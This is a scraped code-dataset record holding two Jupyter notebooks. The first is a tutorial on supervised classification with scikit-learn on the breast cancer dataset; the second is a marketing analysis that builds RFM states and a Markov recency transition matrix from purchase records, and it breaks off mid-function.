from sklearn.metrics import confusion_matrix
import itertools
confusion_mtx = confusion_matrix(actual, predictions)
# plot the confusion matrix
plot_confusion_matrix(confusion_mtx, classes = range(1,6))
plt.show()
| 8,560 |
/edit02-supervised-learning.ipynb
|
e0f8c7ece61185a9f1bac2fc890a9bcf42a94323
|
[] |
no_license
|
27cansoftuna/SysBioShortCourse
|
https://github.com/27cansoftuna/SysBioShortCourse
| 0 | 0 | null | 2019-01-25T21:11:27 | 2018-05-11T20:23:28 | null |
Jupyter Notebook
| false | false |
.py
| 3,080,135 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="6iDR_nGdDIah" colab_type="text"
# ## Tutorial 2: Supervised Learning
# + [markdown] id="NBU3mbGbDIak" colab_type="text"
# ### In this tutorial, we will focus on classification. We will introduce several common supervised learning methods, and discuss the relationship between model complexity and generalization.
# + [markdown] id="PdNlWv9KDIam" colab_type="text"
# ### Generalization, Overfitting and Underfitting
# + [markdown] id="vXytVys8DIan" colab_type="text"
# 
# + hide_input=false id="p-bR3EPqDIap" colab_type="code" colab={}
# %matplotlib inline
from preamble import *
# + id="VgkQqchNDR3Y" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 102} outputId="43d21151-5984-4181-ea67-2fafce528795"
# !git clone https://github.com/xhxuciedu/SysBioShortCourse
# + [markdown] id="cx9iAKB-DIau" colab_type="text"
# #### Relation of Model Complexity to Dataset Size
# + id="fKPZOg_RDf-H" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 136} outputId="2a05fb1c-cf95-43fc-f5c1-009d658ca33b"
# !ls
# + id="ld8OpXvCDmad" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="fec8a77e-06ca-4e0a-a14f-f29dacbee827"
# %cd SysBioShortCourse/
# + [markdown] id="mulaKJAGDIav" colab_type="text"
# ### Supervised Machine Learning Algorithms
# ##### Some Sample Datasets
# + caption="Forge dataset" label="forge_scatter" id="6yWPcEjiDIaw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 296} outputId="2bbe9501-9c65-4403-8b72-06b840392e27"
# generate dataset
X, y = mglearn.datasets.make_forge()
# plot dataset
mglearn.discrete_scatter(X[:, 0], X[:, 1], y)
plt.legend(["Class 0", "Class 1"], loc=4)
plt.xlabel("First feature")
plt.ylabel("Second feature")
print("X.shape: {}".format(X.shape))
# + id="o5URb3QFDIa4" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="fc036995-b50a-4103-fa62-7fe38c821acc"
from sklearn.datasets import load_breast_cancer
cancer = load_breast_cancer()
print("cancer.keys(): {}".format(cancer.keys()))
# + id="G0k2ROAhDIa-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="a8e2cd68-5c55-4398-abb1-d1064ee39cb5"
print("Shape of cancer data: {}".format(cancer.data.shape))
# + id="RiJ7CPwCDIbD" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="fcf7721b-905b-4166-cc2a-7af04b65d562"
print("Sample counts per class:\n{}".format(
{n: v for n, v in zip(cancer.target_names, np.bincount(cancer.target))}))
# + id="sbb7YPX-DIbI" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 187} outputId="de998fb4-ae80-40b6-f44e-14096a8a7ede"
print("Feature names:\n{}".format(cancer.feature_names))
# + [markdown] id="gHNxfhXYDIbP" colab_type="text"
# ### k-Nearest Neighbor
# #### k-Neighbors Classification
# + hide_input=false id="UVzJLdkYDIbR" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 265} outputId="ae5677b4-5d6d-4b4d-ff02-33ccccc17873"
mglearn.plots.plot_knn_classification(n_neighbors=1)
# + hide_input=false id="Ml13cAjZDIbW" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 265} outputId="a59deb52-c4ef-4ffb-b534-a979f6ef13c3"
mglearn.plots.plot_knn_classification(n_neighbors=3)
# + id="XcSxb4xbDIbb" colab_type="code" colab={}
from sklearn.model_selection import train_test_split
X, y = mglearn.datasets.make_forge()
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
# + id="NC5jSikjDIbf" colab_type="code" colab={}
from sklearn.neighbors import KNeighborsClassifier
clf = KNeighborsClassifier(n_neighbors=3)
# + id="iJ1iJqwZDIbj" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="c592d48a-a8f6-4bb1-c91d-f374ec7ad1fb"
clf.fit(X_train, y_train)
# + id="mK6NedzBDIbo" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="f14ccf6a-5e20-4f15-b4b8-86e1e4574992"
print("Test set predictions: {}".format(clf.predict(X_test)))
# + id="TgMhWYG3DIbw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="9ec113c1-c637-4d0d-c198-38f3992c8aa6"
print("Test set accuracy: {:.2f}".format(clf.score(X_test, y_test)))
# + [markdown] id="nHT2TIO3DIb3" colab_type="text"
# ##### Analyzing KNeighborsClassifier
# + hide_input=false id="QuYl5Rr4DIb5" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 240} outputId="15e8b697-6a3b-4667-83d7-69b45e0d4ba6"
fig, axes = plt.subplots(1, 3, figsize=(10, 3))
for n_neighbors, ax in zip([1, 3, 9], axes):
# the fit method returns the object self, so we can instantiate
# and fit in one line:
clf = KNeighborsClassifier(n_neighbors=n_neighbors).fit(X, y)
mglearn.plots.plot_2d_separator(clf, X, fill=True, eps=0.5, ax=ax, alpha=.4)
mglearn.discrete_scatter(X[:, 0], X[:, 1], y, ax=ax)
ax.set_title("{} neighbor(s)".format(n_neighbors))
ax.set_xlabel("feature 0")
ax.set_ylabel("feature 1")
axes[0].legend(loc=3)
# + id="Sa-HpCpLDIb_" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 296} outputId="e1199b28-381a-4d6b-b55c-6da3b3112ae8"
from sklearn.datasets import load_breast_cancer
cancer = load_breast_cancer()
X_train, X_test, y_train, y_test = train_test_split(
cancer.data, cancer.target, stratify=cancer.target, random_state=66)
training_accuracy = []
test_accuracy = []
# try n_neighbors from 1 to 10
neighbors_settings = range(1, 15)
for n_neighbors in neighbors_settings:
# build the model
clf = KNeighborsClassifier(n_neighbors=n_neighbors)
clf.fit(X_train, y_train)
# record training set accuracy
training_accuracy.append(clf.score(X_train, y_train))
# record generalization accuracy
test_accuracy.append(clf.score(X_test, y_test))
plt.plot(neighbors_settings, training_accuracy, label="training accuracy")
plt.plot(neighbors_settings, test_accuracy, label="test accuracy")
plt.ylabel("Accuracy")
plt.xlabel("n_neighbors")
plt.legend()
# + [markdown] id="Hx7EmNU1DIcD" colab_type="text"
# ### Support vector machine (SVM) and Logistic regression
# + id="OrEt5mvRDIcE" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 328} outputId="f01fb2b8-3267-49e2-87ed-2e6e65ab22d9"
from sklearn.linear_model import LogisticRegression
from sklearn.svm import LinearSVC
X, y = mglearn.datasets.make_forge()
fig, axes = plt.subplots(1, 2, figsize=(10, 3))
for model, ax in zip([LinearSVC(), LogisticRegression()], axes):
clf = model.fit(X, y)
mglearn.plots.plot_2d_separator(clf, X, fill=False, eps=0.5,
ax=ax, alpha=.7)
mglearn.discrete_scatter(X[:, 0], X[:, 1], y, ax=ax)
ax.set_title("{}".format(clf.__class__.__name__))
ax.set_xlabel("Feature 0")
ax.set_ylabel("Feature 1")
axes[0].legend()
# + hide_input=false id="_DKe4jv_DIcI" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 263} outputId="57381ae9-b099-468b-b5db-6da2df0cddcd"
mglearn.plots.plot_linear_svc_regularization()
# + id="d7mcXViPDIcQ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 105} outputId="78b224cf-38cb-4d79-ada2-bca7890083be"
from sklearn.datasets import load_breast_cancer
cancer = load_breast_cancer()
X_train, X_test, y_train, y_test = train_test_split(
cancer.data, cancer.target, stratify=cancer.target, random_state=42)
logreg = LogisticRegression(C=0.001).fit(X_train, y_train)
print("Training set score: {:.3f}".format(logreg.score(X_train, y_train)))
print("Test set score: {:.3f}".format(logreg.score(X_test, y_test)))
# + id="bas4iv2qDIcX" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 105} outputId="9cae4b89-a846-4d14-dadb-7ce9b300df2f"
logreg100 = LogisticRegression(C=100).fit(X_train, y_train)
print("Training set score: {:.3f}".format(logreg100.score(X_train, y_train)))
print("Test set score: {:.3f}".format(logreg100.score(X_test, y_test)))
# + id="OXphoI9hDIcd" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 105} outputId="f170e863-81be-42de-a47a-60469d518bff"
logreg001 = LogisticRegression(C=0.01).fit(X_train, y_train)
print("Training set score: {:.3f}".format(logreg001.score(X_train, y_train)))
print("Test set score: {:.3f}".format(logreg001.score(X_test, y_test)))
# + id="9a2l6xGNDIch" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 389} outputId="add9116a-7b79-422a-b01f-7592a3812d3f"
plt.plot(logreg.coef_.T, 'o', label="C=1")
plt.plot(logreg100.coef_.T, '^', label="C=100")
plt.plot(logreg001.coef_.T, 'v', label="C=0.001")
plt.xticks(range(cancer.data.shape[1]), cancer.feature_names, rotation=90)
xlims = plt.xlim()
plt.hlines(0, xlims[0], xlims[1])
plt.xlim(xlims)
plt.ylim(-5, 5)
plt.xlabel("Feature")
plt.ylabel("Coefficient magnitude")
plt.legend()
# + id="Zrr9IOkdDIcl" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 613} outputId="3b1165b7-fbb5-454f-f964-1b560faaf184"
for C, marker in zip([0.001, 1, 100], ['o', '^', 'v']):
lr_l1 = LogisticRegression(C=C, penalty="l1").fit(X_train, y_train)
print("Training accuracy of l1 logreg with C={:.3f}: {:.2f}".format(
C, lr_l1.score(X_train, y_train)))
print("Test accuracy of l1 logreg with C={:.3f}: {:.2f}".format(
C, lr_l1.score(X_test, y_test)))
plt.plot(lr_l1.coef_.T, marker, label="C={:.3f}".format(C))
plt.xticks(range(cancer.data.shape[1]), cancer.feature_names, rotation=90)
xlims = plt.xlim()
plt.hlines(0, xlims[0], xlims[1])
plt.xlim(xlims)
plt.xlabel("Feature")
plt.ylabel("Coefficient magnitude")
plt.ylim(-5, 5)
plt.legend(loc=3)
# + [markdown] id="xQqv0EFPDIcp" colab_type="text"
# ## Exercise 2.1
# #### 1. Plot the receiver operating characteristic curve, i.e. ROC curve (True positive rates vs False Positive rates)
# #### 2. Calculate AUCs for SVC and Logic Regression.
# + id="GYPFWZpUWAXh" colab_type="code" colab={}
from sklearn.metrics import roc_curve, roc_auc_score
# + id="BZLYZbZsDIcq" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 336} outputId="aee2d12d-4ce6-422a-944c-c15f2bb5292c"
logreg100 = LogisticRegression(C=100).fit(X_train, y_train)
yhat = logreg100.predict_proba(X_test)
tpr, fpr, thres = roc_curve(y_test, yhat[:, 1])
plt.plot(tpr, fpr)
plt.plot(np.arange(0,1, 0.1,), np.arange(0, 1, 0.1))
print(roc_auc_score(y_test, yhat[:, 1]))
# + [markdown] id="jL-2gc_uDIcu" colab_type="text"
# ### Decision trees
#
# Install graphviz module using:
#
# conda install graphviz
#
# conda install python-graphviz
# + hide_input=false id="ShkVg9_IDIcv" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 269} outputId="4d05293f-6f51-416d-945c-049acb873701"
mglearn.plots.plot_animal_tree()
# + [markdown] id="cbeB3jIxDIc0" colab_type="text"
# ##### Building decision trees
# Decision Tree Algorithm Pseudocode
#
# Place the best attribute of our dataset at the root of the tree.
# Split the training set into subsets. Subsets should be made in such a way that each subset contains data with the same value for an attribute.
# Repeat step 1 and step 2 on each subset until you find leaf nodes in all the branches of the tree.
#
# + hide_input=false id="K6fiwukxDIc1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 986} outputId="0dfc6f6f-bc30-493d-f059-7e5bd87bdd0a"
mglearn.plots.plot_tree_progressive()
# + [markdown] id="ZjgRespaDIc8" colab_type="text"
# ##### Controlling complexity of decision trees
# + uuid="6e5d7a76-9bba-42f7-b26e-907775d289b2" id="mpVx3UGhDIc9" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="5b949860-ad2e-4f9d-d79e-54dcb46a5d6d"
from sklearn.tree import DecisionTreeClassifier
cancer = load_breast_cancer()
X_train, X_test, y_train, y_test = train_test_split(
cancer.data, cancer.target, stratify=cancer.target, random_state=42)
tree = DecisionTreeClassifier(random_state=0)
tree.fit(X_train, y_train)
print("Accuracy on training set: {:.3f}".format(tree.score(X_train, y_train)))
print("Accuracy on test set: {:.3f}".format(tree.score(X_test, y_test)))
# + id="tIAj2HB1DIdC" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="cfbb7be1-1a55-441b-ffb0-f1f02050edaa"
tree = DecisionTreeClassifier(max_depth=4, random_state=0)
tree.fit(X_train, y_train)
print("Accuracy on training set: {:.3f}".format(tree.score(X_train, y_train)))
print("Accuracy on test set: {:.3f}".format(tree.score(X_test, y_test)))
# + [markdown] id="Cae1PkIVDIdF" colab_type="text"
# #### Analyzing Decision Trees
# + id="B3DZfQwWDIdG" colab_type="code" colab={}
from sklearn.tree import export_graphviz
export_graphviz(tree, out_file="tree.dot", class_names=["mean area", "worst area"],
feature_names=cancer.feature_names, impurity=False, filled=True)
# + id="4bGTTeWMDIdI" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 677} outputId="604f9a9d-66c6-4a2e-9275-fa76fd45db4d"
import graphviz
with open("tree.dot") as f:
dot_graph = f.read()
display(graphviz.Source(dot_graph))
# + [markdown] id="uj7d9UBQDIdM" colab_type="text"
# #### Feature Importance in trees
# + uuid="dc2f68ee-0df0-47ed-b500-7ec99d5a0a5d" id="e6D8wZB0DIdN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="5c7dd212-2a04-457e-dbff-ff0d81e3929c"
print("Feature importances:\n{}".format(tree.feature_importances_))
# + id="s2Fd7nuuDIdS" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 279} outputId="12257343-62f6-42ee-ec38-e947aa00ba33"
def plot_feature_importances_cancer(model):
n_features = cancer.data.shape[1]
plt.barh(range(n_features), model.feature_importances_, align='center')
plt.yticks(np.arange(n_features), cancer.feature_names)
plt.xlabel("Feature importance")
plt.ylabel("Feature")
plt.ylim(-1, n_features)
plot_feature_importances_cancer(tree)
# + hide_input=false id="6LM8Xw3YDIdb" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 568} outputId="7397e209-e680-4d4f-9f1f-2238d11487d3"
tree = mglearn.plots.plot_tree_not_monotone()
display(tree)
# + [markdown] id="8zb02UUgDIdf" colab_type="text"
# #### Ensembles of Decision Trees
# ##### Random forests
# ###### Building random forests
# ###### Analyzing random forests
# + uuid="b84dcdfe-994f-4a3d-842e-830153eefc59" id="GiMHlsecDIdg" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 119} outputId="b9b174c7-bce5-4f32-8c48-fcf907f92754"
from sklearn.ensemble import RandomForestClassifier
from sklearn.datasets import make_moons
X, y = make_moons(n_samples=100, noise=0.25, random_state=3)
X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y,
random_state=42)
forest = RandomForestClassifier(n_estimators=10, random_state=2)
forest.fit(X_train, y_train)
# + id="RiN-xHfgDIdq" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="d134924d-f656-451c-ee94-d82ccfe2b44e"
X_train, X_test, y_train, y_test = train_test_split(
cancer.data, cancer.target, random_state=0)
forest = RandomForestClassifier(n_estimators=100, random_state=0)
forest.fit(X_train, y_train)
print("Accuracy on training set: {:.3f}".format(forest.score(X_train, y_train)))
print("Accuracy on test set: {:.3f}".format(forest.score(X_test, y_test)))
# + uuid="76ce4154-b441-475e-97e3-1b507964eb29" id="beZGXN0ZDIdl" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 623} outputId="bdc35457-3eea-437b-c4fc-60e8cb4d9229"
fig, axes = plt.subplots(2, 3, figsize=(20, 10))
for i, (ax, tree) in enumerate(zip(axes.ravel(), forest.estimators_)):
ax.set_title("Tree {}".format(i))
mglearn.plots.plot_tree_partition(X_train, y_train, tree, ax=ax)
mglearn.plots.plot_2d_separator(forest, X_train, fill=True, ax=axes[-1, -1],
alpha=.4)
axes[-1, -1].set_title("Random Forest")
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train)
# + id="JCvsomr9DIdw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 279} outputId="08b130d3-6fc3-47b8-9cb4-3cdc8250f227"
plot_feature_importances_cancer(forest)
# + [markdown] id="fp3OIcC0DId2" colab_type="text"
# ###### Strengths, weaknesses, and parameters
# + [markdown] id="YjvuVuKADId3" colab_type="text"
# #### Gradient Boosted Regression Trees (Gradient Boosting Machines)
# + id="PLKcLzQoDId6" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="674981f1-3c52-4da1-ecd9-fccc9497e04b"
from sklearn.ensemble import GradientBoostingClassifier
X_train, X_test, y_train, y_test = train_test_split(
cancer.data, cancer.target, random_state=0)
gbrt = GradientBoostingClassifier(random_state=0)
gbrt.fit(X_train, y_train)
print("Accuracy on training set: {:.3f}".format(gbrt.score(X_train, y_train)))
print("Accuracy on test set: {:.3f}".format(gbrt.score(X_test, y_test)))
# + id="-RgOwvDUDId-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="b2f4535e-00eb-46ba-e773-4317c6ac8b7a"
gbrt = GradientBoostingClassifier(random_state=0, max_depth=2)
gbrt.fit(X_train, y_train)
print("Accuracy on training set: {:.3f}".format(gbrt.score(X_train, y_train)))
print("Accuracy on test set: {:.3f}".format(gbrt.score(X_test, y_test)))
# + id="QejX-NLNDIeF" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="5b50c262-dbb9-4f3a-d70e-0788ac07aafa"
gbrt = GradientBoostingClassifier(random_state=0, learning_rate=0.01)
gbrt.fit(X_train, y_train)
print("Accuracy on training set: {:.3f}".format(gbrt.score(X_train, y_train)))
print("Accuracy on test set: {:.3f}".format(gbrt.score(X_test, y_test)))
# + id="oq4fT88LDIeJ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 279} outputId="4259bb01-0991-4b6f-ae88-f60dab0e8c19"
gbrt = GradientBoostingClassifier(random_state=0, max_depth=1, learning_rate = 0.1)
gbrt.fit(X_train, y_train)
plot_feature_importances_cancer(gbrt)
# + id="gZw1ySvTYKIb" colab_type="code" colab={}
# + [markdown] id="lA9pQyFLDIeQ" colab_type="text"
# ### Neural Networks (Deep Learning)
# #### The Neural Network Model
# + hide_input=false id="MQzj3TIKDIeR" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 389} outputId="505ecf8b-df00-4c13-ad6b-6a35150ead40"
display(mglearn.plots.plot_logistic_regression_graph())
# + hide_input=false id="T909Vmm9DIeV" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 389} outputId="ff98ccd4-6970-4713-bc66-43b5038dee84"
display(mglearn.plots.plot_single_hidden_layer_graph())
# + id="oXzAbdh6DIeY" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 316} outputId="b28b9746-e758-44d0-f7f6-168bcf2399b0"
line = np.linspace(-3, 3, 100)
plt.plot(line, np.tanh(line), label="tanh")
plt.plot(line, np.maximum(line, 0), label="relu")
plt.legend(loc="best")
plt.xlabel("x")
plt.ylabel("relu(x), tanh(x)")
# + hide_input=false id="Rf92-ckBDIeb" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 389} outputId="3927438f-e329-4a5b-a566-ada2298bdd49"
mglearn.plots.plot_two_hidden_layer_graph()
# + [markdown] id="73zTpUugDIee" colab_type="text"
# #### Tuning Neural Networks
# + id="RYxYMLToDIef" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 299} outputId="f8408da2-24ea-4e0d-9535-359604b428ec"
from sklearn.neural_network import MLPClassifier
from sklearn.datasets import make_moons
X, y = make_moons(n_samples=100, noise=0.25, random_state=3)
X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y,
random_state=42)
mlp = MLPClassifier(solver='lbfgs', random_state=0).fit(X_train, y_train)
mglearn.plots.plot_2d_separator(mlp, X_train, fill=True, alpha=.3)
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train)
plt.xlabel("Feature 0")
plt.ylabel("Feature 1")
# + id="BUTqau_ZDIej" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 299} outputId="195ba948-8657-44d6-b94e-51198440ede3"
mlp = MLPClassifier(solver='lbfgs', random_state=0, hidden_layer_sizes=[10])
mlp.fit(X_train, y_train)
mglearn.plots.plot_2d_separator(mlp, X_train, fill=True, alpha=.3)
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train)
plt.xlabel("Feature 0")
plt.ylabel("Feature 1")
# + id="UNgl9BIlDIep" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 299} outputId="1876f935-fb34-499d-ea50-63401f386691"
# using two hidden layers, with 10 units each
mlp = MLPClassifier(solver='lbfgs', random_state=0,
hidden_layer_sizes=[10, 10])
mlp.fit(X_train, y_train)
mglearn.plots.plot_2d_separator(mlp, X_train, fill=True, alpha=.3)
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train)
plt.xlabel("Feature 0")
plt.ylabel("Feature 1")
# + id="2iljVriJDIes" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 299} outputId="1abb493b-f855-4dbd-c320-263234b82a28"
# using two hidden layers, with 10 units each, now with tanh nonlinearity.
mlp = MLPClassifier(solver='lbfgs', activation='tanh',
random_state=0, hidden_layer_sizes=[10, 10])
mlp.fit(X_train, y_train)
mglearn.plots.plot_2d_separator(mlp, X_train, fill=True, alpha=.3)
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train)
plt.xlabel("Feature 0")
plt.ylabel("Feature 1")
# + id="Hn7lXZVlDIex" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 515} outputId="9eee3eeb-125c-44a8-ebc3-6ca932d0836b"
fig, axes = plt.subplots(2, 4, figsize=(20, 8))
for axx, n_hidden_nodes in zip(axes, [10, 100]):
for ax, alpha in zip(axx, [0.0001, 0.01, 0.1, 1]):
mlp = MLPClassifier(solver='lbfgs', random_state=0,
hidden_layer_sizes=[n_hidden_nodes, n_hidden_nodes],
alpha=alpha)
mlp.fit(X_train, y_train)
mglearn.plots.plot_2d_separator(mlp, X_train, fill=True, alpha=.3, ax=ax)
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train, ax=ax)
ax.set_title("n_hidden=[{}, {}]\nalpha={:.4f}".format(
n_hidden_nodes, n_hidden_nodes, alpha))
# + id="ur4xb38TDIe1" colab_type="code" colab={}
fig, axes = plt.subplots(2, 4, figsize=(20, 8))
for i, ax in enumerate(axes.ravel()):
mlp = MLPClassifier(solver='lbfgs', random_state=i,
hidden_layer_sizes=[100, 100])
mlp.fit(X_train, y_train)
mglearn.plots.plot_2d_separator(mlp, X_train, fill=True, alpha=.3, ax=ax)
mglearn.discrete_scatter(X_train[:, 0], X_train[:, 1], y_train, ax=ax)
# + id="S-NJHHPdDIe8" colab_type="code" colab={}
print("Cancer data per-feature maxima:\n{}".format(cancer.data.max(axis=0)))
# + id="Q8ducvPBDIfD" colab_type="code" colab={}
X_train, X_test, y_train, y_test = train_test_split(
cancer.data, cancer.target, random_state=0)
mlp = MLPClassifier(random_state=42)
mlp.fit(X_train, y_train)
print("Accuracy on training set: {:.2f}".format(mlp.score(X_train, y_train)))
print("Accuracy on test set: {:.2f}".format(mlp.score(X_test, y_test)))
# + id="cRzIUXP1DIfH" colab_type="code" colab={}
# compute the mean value per feature on the training set
mean_on_train = X_train.mean(axis=0)
# compute the standard deviation of each feature on the training set
std_on_train = X_train.std(axis=0)
# subtract the mean, and scale by inverse standard deviation
# afterward, mean=0 and std=1
X_train_scaled = (X_train - mean_on_train) / std_on_train
# use THE SAME transformation (using training mean and std) on the test set
X_test_scaled = (X_test - mean_on_train) / std_on_train
mlp = MLPClassifier(random_state=0)
mlp.fit(X_train_scaled, y_train)
print("Accuracy on training set: {:.3f}".format(
mlp.score(X_train_scaled, y_train)))
print("Accuracy on test set: {:.3f}".format(mlp.score(X_test_scaled, y_test)))
# + id="6MiU0GnVDIfM" colab_type="code" colab={}
mlp = MLPClassifier(max_iter=1000, random_state=0)
mlp.fit(X_train_scaled, y_train)
print("Accuracy on training set: {:.3f}".format(
mlp.score(X_train_scaled, y_train)))
print("Accuracy on test set: {:.3f}".format(mlp.score(X_test_scaled, y_test)))
# + id="JMC4lBoUDIfQ" colab_type="code" colab={}
mlp = MLPClassifier(max_iter=1000, alpha=1, random_state=0)
mlp.fit(X_train_scaled, y_train)
print("Accuracy on training set: {:.3f}".format(
mlp.score(X_train_scaled, y_train)))
print("Accuracy on test set: {:.3f}".format(mlp.score(X_test_scaled, y_test)))
# + id="MlDacqMyDIfV" colab_type="code" colab={}
plt.figure(figsize=(20, 5))
plt.imshow(mlp.coefs_[0], interpolation='none', cmap='viridis')
plt.yticks(range(30), cancer.feature_names)
plt.xlabel("Columns in weight matrix")
plt.ylabel("Input feature")
plt.colorbar()
# + [markdown] id="4WUIbQ7yDIfY" colab_type="text"
# ## Exercise 2.2
#
# Apply the above classification methods to the breast cancer dataset. Try different hyper-parameters. Find the best method/parameter set combination that yields the best test classification result in terms of AUC.
# + id="WIvbyYX4DIfZ" colab_type="code" colab={}
| 25,814 |
/Markov Chain.ipynb
|
bae4f06d133c7969dfa50dab2d1ff5dab26e86c2
|
[] |
no_license
|
virat183/Marketing-Data-Science
|
https://github.com/virat183/Marketing-Data-Science
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 93,734 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python [conda root]
# language: python
# name: conda-root-py
# ---
# +
from collections import Counter
# %matplotlib inline
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
# +
transactions = pd.read_csv("purchases.txt", delimiter="\t", header=None)
transactions.columns = ['cust_id', 'purchase_amt', 'date']
transactions['year'] = transactions['date'].apply(lambda x: x[:4])
transactions['purchase_amt'] = transactions['purchase_amt'].apply(lambda x: float(x))
transactions.head()
# +
fig, axs = plt.subplots(1,1, figsize = (10,5))
axs.hist(transactions['purchase_amt'], bins=50);
axs.set_title('Histogram of Purchase Amounts');
axs.set_xlabel("Purchase Amount (Dollars)");
axs.set_ylabel("Count");
# -
transactions = transactions.groupby(['cust_id', 'year'])['purchase_amt'].sum().reset_index()
purchase_amts = transactions['purchase_amt']
purchase_amts.mean()
boolean_matrix = pd.crosstab(transactions.cust_id, [transactions.year], rownames=['cust_id'], colnames=['year'])
boolean_matrix = boolean_matrix.applymap(lambda x: 1 if x>0 else 0)
boolean_matrix_restricted = boolean_matrix[boolean_matrix['2005'] == 1]
boolean_matrix_restricted.head()
recency_matrix, RFM_matrix = build_recency_and_RFM_matrix(boolean_matrix_restricted, transactions)
# +
frequencies = []
for row in RFM_matrix:
for cell_value in row:
frequencies.append(cell_value[1])
# +
recency_df = pd.DataFrame(np.array(recency_matrix))
recency_df.index = boolean_matrix_restricted.index
recency_df.columns = boolean_matrix_restricted.columns
recency_df.head()
# -
total_at_recency_dict = {}
total_transition_recencies_dict = {}
# +
# dictionary mapping RFM tuples to numbered states
RFM_states = {(1, 1, 1): 1,
(1, 1, 2): 2,
(1, 1, 3): 3,
(1, 2, 1): 4,
(1, 2, 2): 5,
(1, 2, 3): 6,
(2, 1, 1): 7,
(2, 1, 2): 8,
(2, 1, 3): 9,
(2, 2, 1): 10,
(2, 2, 2): 11,
(2, 2, 3): 12,
(3, 1, 1): 13,
(3, 1, 2): 14,
(3, 1, 3): 15,
(3, 2, 1): 16,
(3, 2, 2): 17,
(3, 2, 3): 18}
# +
state_matrix = convert_to_state_matrix(RFM_matrix, RFM_states)
state_df = pd.DataFrame(np.array(state_matrix))
state_df.columns = boolean_matrix_restricted.columns
state_df.index = boolean_matrix_restricted.index
state_df.head()
# -
# build transition matrix for recency
for recency_score in range(11):
total_at_recency = 0
total_transition_states_observed = Counter()
for year in state_df.columns:
# no data for 2016 so leave 2015 out
if year == '2015':
break
# reduce dataframe to people who were in this state this year
this_recency_this_year = recency_df[recency_df[year] == recency_score]
# total number of people observed in this state this year
total_this_recency_this_year = this_recency_this_year.shape[0]
total_at_recency += total_this_recency_this_year
# get count of states observed the next year
next_year = str(int(year) + 1)
observed_recencies_next_year = Counter(list(this_recency_this_year[next_year]))
total_transition_states_observed += observed_recencies_next_year
total_at_recency_dict[recency_score] = total_at_recency
total_transition_recencies_dict[recency_score] = total_transition_states_observed
# +
# build recency transition matrix
recency_transition_matrix = np.zeros((11,11))
for i in range(10):
for j in range(11):
transition_prob = total_transition_recencies_dict[i][j] / total_at_recency_dict[i]
recency_transition_matrix[i, j] = transition_prob
# -
pd.DataFrame(recency_transition_matrix)
# +
frequencies = []
for row in RFM_matrix:
for cell_value in row:
frequencies.append(cell_value[1])
# +
# some useful functions
def build_recency_and_RFM_matrix(boolean_matrix, transactions):
'''
INPUT: boolean matrix with users as rows, years as columns.
cell value 1 if user made a purchase in that year.
cell value 0 if user made no purchase in that year.
OUTPUT:
